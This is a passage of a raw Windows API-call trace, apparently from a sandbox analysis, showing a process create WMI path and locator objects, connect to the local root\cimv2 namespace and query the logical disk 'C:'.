Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce5b4 | out: ppvObject=0x6bce5b4*=0x6738460) returned 0x0 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce570 | out: ppvObject=0x6bce570*=0x0) returned 0x80004002 [0190.532] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcdecc | out: ppvObject=0x6bcdecc*=0x0) returned 0x80004002 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde7c | out: ppvObject=0x6bcde7c*=0x0) returned 0x80004002 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde88 | out: ppvObject=0x6bcde88*=0x7ae600) returned 0x0 [0190.532] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae600, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde90 | out: pCid=0x6bcde90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0190.532] WbemDefPath:IUnknown:Release (This=0x7ae600) returned 0x3 [0190.532] CoGetContextToken (in: pToken=0x6bcdee8 | out: pToken=0x6bcdee8) returned 0x0 [0190.532] CoGetContextToken (in: pToken=0x6bce2f0 | out: pToken=0x6bce2f0) returned 0x0 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce380 | out: ppvObject=0x6bce380*=0x0) returned 0x80004002 [0190.533] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0190.533] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0190.533] CoGetContextToken (in: pToken=0x6bcec78 | out: pToken=0x6bcec78) returned 0x0 [0190.533] CoGetContextToken (in: pToken=0x6bcebd8 | out: pToken=0x6bcebd8) returned 0x0 [0190.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x6bceca8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bceca4 | out: ppvObject=0x6bceca4*=0x6738460) returned 0x0 [0190.533] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0190.533] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0190.533] WbemDefPath:IWbemPath:SetText (This=0x6738460, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcee2c | out: puCount=0x6bcee2c*=0x0) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bcee28*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee28*=0x20, pszText=0x0) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bcee28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x6bcee34 | out: puResponse=0x6bcee34*=0xc19) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcee2c | out: puCount=0x6bcee2c*=0x0) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x6bcee34 | out: puResponse=0x6bcee34*=0xc19) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x6bcee34 | out: puResponse=0x6bcee34*=0xc19) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcedac | out: puCount=0x6bcedac*=0x0) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bced98 | out: puCount=0x6bced98*=0x2) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced94*=0x0, pszText=0x0 | out: puBuffLength=0x6bced94*=0xf, pszText=0x0) returned 0x0 [0190.533] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced94*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced94*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0190.533] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced48 | out: ppv=0x6bced48*=0x72015c) returned 0x0 [0190.534] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced40 | out: pAptType=0x6bced40*=1) returned 0x0 [0190.534] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced44 | out: ppvObject=0x6bced44*=0x0) returned 0x80004002 [0190.534] IUnknown:Release (This=0x72015c) returned 0x1 [0190.535] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce6b0 | out: ppv=0x6bce6b0*=0x67370a8) returned 0x0 [0190.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce8c8 | out: ppvObject=0x6bce8c8*=0x0) returned 0x80004002 [0190.688] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce8dc | out: ppvObject=0x6bce8dc*=0x6738b60) returned 0x0 [0190.688] WbemDefPath:IUnknown:Release (This=0x67370a8) returned 0x0 [0190.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4fc | out: ppvObject=0x6bce4fc*=0x6738b60) returned 0x0 [0190.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce4b8 | out: ppvObject=0x6bce4b8*=0x0) returned 0x80004002 [0190.688] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0190.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde14 | out: ppvObject=0x6bcde14*=0x0) returned 0x80004002 [0190.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcddc4 | out: ppvObject=0x6bcddc4*=0x0) returned 0x80004002 [0190.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcddd0 | out: ppvObject=0x6bcddd0*=0x7ae4b0) returned 0x0 [0190.688] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae4b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcddd8 | out: pCid=0x6bcddd8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0190.688] WbemDefPath:IUnknown:Release (This=0x7ae4b0) returned 0x3 [0190.688] CoGetContextToken (in: pToken=0x6bcde30 | out: pToken=0x6bcde30) returned 0x0 [0190.688] CoGetContextToken (in: pToken=0x6bce238 | out: pToken=0x6bce238) returned 0x0 [0190.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce2c8 | out: ppvObject=0x6bce2c8*=0x0) returned 0x80004002 [0190.689] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0190.689] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0190.689] CoGetContextToken (in: pToken=0x6bcebc0 | out: pToken=0x6bcebc0) returned 0x0 [0190.689] CoGetContextToken (in: pToken=0x6bceb20 | out: pToken=0x6bceb20) returned 0x0 [0190.689] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x6bcebf0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcebec | out: ppvObject=0x6bcebec*=0x6738b60) returned 0x0 [0190.689] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0190.689] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0190.689] WbemDefPath:IWbemPath:SetText (This=0x6738b60, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0190.689] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x6bced70 | out: puCount=0x6bced70*=0x2) returned 0x0 [0190.689] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6bced6c*=0x0, pszText=0x0 | out: puBuffLength=0x6bced6c*=0xf, pszText=0x0) returned 0x0 [0190.689] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6bced6c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced6c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0190.689] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced70 | out: ppv=0x6bced70*=0x72015c) returned 0x0 [0190.689] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced68 | out: pAptType=0x6bced68*=1) returned 0x0 [0190.689] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced6c | out: ppvObject=0x6bced6c*=0x0) returned 0x80004002 [0190.689] IUnknown:Release (This=0x72015c) returned 0x1 [0190.690] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce990 | out: ppv=0x6bce990*=0x672f1d8) returned 0x0 [0190.690] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bceba8 | out: ppvObject=0x6bceba8*=0x0) returned 0x80004002 [0190.690] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcebbc | out: ppvObject=0x6bcebbc*=0x6736f48) returned 0x0 [0190.690] WbemLocator:IUnknown:Release (This=0x672f1d8) returned 0x0 [0190.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce7dc | out: ppvObject=0x6bce7dc*=0x6736f48) returned 0x0 [0190.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce798 | out: ppvObject=0x6bce798*=0x0) returned 0x80004002 [0190.691] WbemLocator:IUnknown:AddRef (This=0x6736f48) returned 0x3 [0190.691] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0f4 | out: ppvObject=0x6bce0f4*=0x0) returned 0x80004002 [0190.691] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce0a4 | out: ppvObject=0x6bce0a4*=0x0) returned 0x80004002 [0190.691] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce0b0 | out: ppvObject=0x6bce0b0*=0x0) returned 0x80004002 [0190.691] CoGetContextToken (in: pToken=0x6bce110 | out: pToken=0x6bce110) returned 0x0 [0190.691] CoGetContextToken (in: pToken=0x6bce518 | out: pToken=0x6bce518) returned 0x0 [0190.691] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce5a8 | out: ppvObject=0x6bce5a8*=0x0) returned 0x80004002 [0190.692] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x2 [0190.692] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x1 [0190.692] CoGetContextToken (in: pToken=0x6bceb88 | out: pToken=0x6bceb88) returned 0x0 [0190.692] CoGetContextToken (in: pToken=0x6bceae8 | out: pToken=0x6bceae8) returned 0x0 [0190.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x6bcebb8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bcebb4 | out: ppvObject=0x6bcebb4*=0x6736f48) returned 0x0 [0190.692] WbemLocator:IUnknown:AddRef (This=0x6736f48) returned 0x3 [0190.692] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x2 [0190.692] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x6bced4c | out: puCount=0x6bced4c*=0x2) returned 0x0 [0190.692] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x6bced48*=0x0, pszText=0x0 | out: puBuffLength=0x6bced48*=0xf, pszText=0x0) returned 0x0 [0190.692] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x6bced48*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced48*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0190.692] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcec24 | out: ppv=0x6bcec24*=0x6737028) returned 0x0 [0190.692] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737028, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bcecb8 | out: ppNamespace=0x6bcecb8*=0x67481b4) returned 0x0 [0192.183] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb54 | out: ppvObject=0x6bceb54*=0x781904) returned 0x0 [0192.183] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781904, pProxy=0x67481b4, pAuthnSvc=0x6bceba4, pAuthzSvc=0x6bceba0, pServerPrincName=0x6bceb98, pAuthnLevel=0x6bceb9c, pImpLevel=0x6bceb8c, pAuthInfo=0x6bceb90, pCapabilites=0x6bceb94 | out: pAuthnSvc=0x6bceba4*=0xa, pAuthzSvc=0x6bceba0*=0x0, pServerPrincName=0x6bceb98, pAuthnLevel=0x6bceb9c*=0x6, pImpLevel=0x6bceb8c*=0x2, pAuthInfo=0x6bceb90, pCapabilites=0x6bceb94*=0x1) returned 0x0 [0192.183] WbemLocator:IUnknown:Release (This=0x781904) returned 0x1 [0192.183] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb48 | out: ppvObject=0x6bceb48*=0x781924) returned 0x0 [0192.183] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb44 | out: ppvObject=0x6bceb44*=0x781904) returned 0x0 [0192.183] WbemLocator:IClientSecurity:SetBlanket (This=0x781904, pProxy=0x67481b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0192.184] WbemLocator:IUnknown:Release (This=0x781904) returned 0x2 [0192.184] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0192.184] CoTaskMemFree (pv=0x77e118) [0192.184] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x0 [0192.184] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce744 | out: ppvObject=0x6bce744*=0x781924) returned 0x0 [0192.184] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce700 | out: ppvObject=0x6bce700*=0x0) returned 0x80004002 [0192.186] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce51c | out: ppvObject=0x6bce51c*=0x0) returned 0x80004002 [0192.188] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0192.188] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce05c | out: ppvObject=0x6bce05c*=0x0) returned 0x80004002 [0192.195] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce00c | out: ppvObject=0x6bce00c*=0x0) returned 0x80004002 [0192.255] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce018 | out: ppvObject=0x6bce018*=0x781884) returned 0x0 [0192.255] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781884, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bce020 | out: pCid=0x6bce020*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.255] WbemLocator:IUnknown:Release (This=0x781884) returned 0x3 [0192.255] CoGetContextToken (in: pToken=0x6bce078 | out: pToken=0x6bce078) returned 0x0 [0192.255] CoGetContextToken (in: pToken=0x6bce480 | out: pToken=0x6bce480) returned 0x0 [0192.256] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce510 | out: ppvObject=0x6bce510*=0x78190c) returned 0x0 [0192.256] WbemLocator:IRpcOptions:Query (in: This=0x78190c, pPrx=0x781924, dwProperty=2, pdwValue=0x6bce538 | out: pdwValue=0x6bce538) returned 0x80004002 [0192.256] WbemLocator:IUnknown:Release (This=0x78190c) returned 0x3 [0192.256] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0192.256] CoGetContextToken (in: pToken=0x6bcea58 | out: pToken=0x6bcea58) returned 0x0 [0192.256] CoGetContextToken (in: pToken=0x6bce9b8 | out: pToken=0x6bce9b8) returned 0x0 [0192.256] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x6bcea88*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcea84 | out: ppvObject=0x6bcea84*=0x67481b4) returned 0x0 [0192.256] WbemLocator:IUnknown:AddRef (This=0x67481b4) returned 0x4 [0192.256] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x3 [0192.256] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x2 [0192.256] SysStringLen (param_1=0x0) returned 0x0 [0192.256] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcee1c | out: puCount=0x6bcee1c*=0x0) returned 0x0 [0192.256] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bcee18*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee18*=0x20, pszText=0x0) returned 0x0 [0192.256] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bcee18*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee18*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.256] CoGetContextToken (in: pToken=0x6bcea88 | out: pToken=0x6bcea88) returned 0x0 [0192.256] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0192.256] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce91c | out: ppvObject=0x6bce91c*=0x781924) returned 0x0 [0192.257] WbemLocator:IUnknown:Release (This=0x781924) returned 0x3 [0192.257] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 